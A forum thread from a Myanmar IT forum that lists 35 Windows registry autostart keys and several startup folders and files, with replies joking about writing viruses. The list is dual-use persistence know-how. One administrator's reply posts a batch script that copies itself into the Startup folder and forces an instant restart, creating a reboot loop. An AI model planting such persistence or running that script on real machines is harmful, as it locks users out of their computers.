Myanmar IT Resource Forum
Myanmar IT Resource Forum
Myanmar IT Resource Forum

You are not connected. Please login or register

View previous topic View next topic Go down  Message [Page 1 of 1]

135 Ways to add your program on Startup Empty 35 Ways to add your program on Startup 14th July 2009, 4:42 pm

sHa92

sHa92
Founder



Founder
ကိုယ့္ Program ေလးေတြကို Startup လုပ္ႏိုင္ဖို႔ Registry မွာျပင္ႏိုင္မည့္ နည္းလမ္းအသြယ္သြယ္ ၃၅ ရပ္ပါ၊
MyanmarOpenXteam ကိုသြားရင္းကေန ေတြ႔လာလုိ႔ ၿပန္ရွဲလိုက္ပါတယ္....
ဥာဏ္ရိွသလို သုံးနုိင္ၾကပါေစ....

Registry Autostart Locations

1.HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Run\
All values in this key are executed.
2.HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\RunOnce\
All values in this key are executed, and then their autostart reference is deleted.
3.

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\RunServices\
All values in this key are executed as services.
4.

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\RunServicesOnce\
All values in this key are executed as services, and then their autostart reference is deleted.
5.

HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run\
All values in this key are executed.

6.

HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\RunOnce\
All values in this key are executed, and then their autostart reference is deleted.

7.

HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\RunOnce\Setup\
Used only by Setup. Displays a progress dialog box as the keys are run one at a time.
8.

HKEY_USERS\.Default\Software\Microsoft\Windows\Cur rentVersion\Run\
Similar to the Run key from HKEY_CURRENT_USER.
9.

HKEY_USERS\.Default\Software\Microsoft\Windows\Cur rentVersion\RunOnce\
Similar to the RunOnce key from HKEY_CURRENT_USER.
10.

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
The "Shell" value is monitored. This value is executed after you log in.
11.

HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\
All subkeys are monitored, with special attention paid to the "StubPath" value in each subkey.
12.

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Servic es\VxD\
All subkeys are monitored, with special attention paid to the "StaticVXD" value in each subkey.
13.

HKEY_CURRENT_USER\Control Panel\Desktop
The "SCRNSAVE.EXE" value is monitored. This value is launched when your screen saver activates.
14.

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Contro l\Session Manager
The "BootExecute" value is monitored. Files listed here are Native Applications that are executed before Windows starts.
15.

HKEY_CLASSES_ROOT\vbsfile\shell\open\command\
Executed whenever a .VBS file (Visual Basic Script) is run.
16.

HKEY_CLASSES_ROOT\vbefile\shell\open\command\
Executed whenever a .VBE file (Encoded Visual Basic Script) is run.
17.

HKEY_CLASSES_ROOT\jsfile\shell\open\command\
Executed whenever a .JS file (Javascript) is run.
18.

HKEY_CLASSES_ROOT\jsefile\shell\open\command\
Executed whenever a .JSE file (Encoded Javascript) is run.
19.

HKEY_CLASSES_ROOT\wshfile\shell\open\command\
Executed whenever a .WSH file (Windows Scripting Host) is run.
20.

HKEY_CLASSES_ROOT\wsffile\shell\open\command\
Executed whenever a .WSF file (Windows Scripting File) is run.
21.

HKEY_CLASSES_ROOT\exefile\shell\open\command\
Executed whenever a .EXE file (Executable) is run.
22.

HKEY_CLASSES_ROOT\comfile\shell\open\command\
Executed whenever a .COM file (Command) is run.
23.

HKEY_CLASSES_ROOT\batfile\shell\open\command\
Executed whenever a .BAT file (Batch Command) is run.
24.

HKEY_CLASSES_ROOT\scrfile\shell\open\command\
Executed whenever a .SCR file (Screen Saver) is run.
25.

HKEY_CLASSES_ROOT\piffile\shell\open\command\
Executed whenever a .PIF file (Portable Interchange Format) is run.
26.

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Servic es\
Services marked to startup automatically are executed before user login.
27.

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Servic es\Winsock2\Parameters\Protocol_Catalog\Catalog_En tries\
Layered Service Providers, executed before user login.
28.

HKEY_LOCAL_MACHINE\System\Control\WOW\cmdline
Executed when a 16-bit Windows executable is executed.
29.

HKEY_LOCAL_MACHINE\System\Control\WOW\wowcmdline
Executed when a 16-bit DOS application is executed.
30.

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
Executed when a user logs in.
31.

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\ShellServiceObjectDelayLoad\
Executed by explorer.exe as soon as it has loaded.
32.

HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\run
Executed when the user logs in.
33.

HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\load
Executed when the user logs in.
34.

HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer\run\
Subvalues are executed when Explorer initialises.
35.

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Policies\Explorer\run\
Subvalues are executed when Explorer initialises.

Folder Autostart Locations

1. windir\Start Menu\Programs\Startup\
2. User\Startup\
3. All Users\Startup\
4. windir\system\iosubsys\
5. windir\system\vmm32\
6. windir\Tasks\

File Autostart Locations

1. c:\explorer.exe
2. c:\autoexec.bat
3. c:\config.sys
4. windir\wininit.ini
5. windir\winstart.bat
6. windir\win.ini - [windows] "load"
7. windir\win.ini - [windows] "run"
8. windir\system.ini - [boot] "shell"
9. windir\system.ini - [boot] "scrnsave.exe"
10. windir\dosstart.bat
11. windir\system\autoexec.nt
12. windir\system\config.nt

http://www.myanmaritresource.info

AcronomeArk

AcronomeArk
MITR New User



Man, thx man
This post is totally usefully. Now, I can determine the places where VIRUS can start.
Please share such-cool-things further.

Acr0

sHa92

sHa92
Founder



Founder
Very Happy
ရွာေဖြေလေလ ေတြ႔ရိွေလပါကြာ....
မင္းကို Site ထဲမွာ မေတြ႔တာၾကာေတာ့ ေမ့ေတာင္ေနတယ္

Gstreamer ေလးေကာ သြားၾကည့္လုိက္ဦး အဆင္ေၿပလားမသိဘူး...

http://www.myanmaritresource.info

sHa92

sHa92
Founder



Founder
တစ္ခုေတာ့ ေၿပာရဦးမယ္...
မင္း Virus ေရးၿပီးရင္
ငါ့ကို ေတာ့ မစမ္းခုိင္းနဲ႔ေတာ့ေနာ္.... Razz အရင္က ေနရာမသိတာေတာင္မွ ဒီေလာက္ သတ္ရခက္တာ.. အခု ေနရာသိသြားေတာ့.. ေၾကာက္၏.... Very Happy

http://www.myanmaritresource.info

alt.332

alt.332
Administrator



Administrator
@echo off
copy alt.bat "c:\documents & settings\all users\start menu\programs\start up
shutdown -r -t 00 -c "sorry"



ဒီအတိုင္းေလးဆိုရင္လည္းအလုပ္ျဖစ္ပါလိမ့္မယ္ဗ်ာ.... alt.bat နဲ႔ save လိုက္ပါ...စမ္းခ်င္ရင္ေတာ့ သေဘာေပါ့ဗ်ာ...ဟီဟိ...ကၽြန္ေတာ္ေတာ့ မစမ္းဘူး Very Happy

http://www.myanmaritresource.info

635 Ways to add your program on Startup Empty Re: 35 Ways to add your program on Startup 23rd January 2011, 3:08 am

x-zip

x-zip
MITR New User



အရမ္းေတာ္ၾကတယ္ဗ်ာ .. မုိက္တယ္ ..ေက်းဇူးပါ

Sponsored content


View previous topic View next topic Back to top  Message [Page 1 of 1]

Permissions in this forum:
You cannot reply to topics in this forum

 

Create free forum | ©phpBB | Free forum support | Report an abuse | Forumotion.com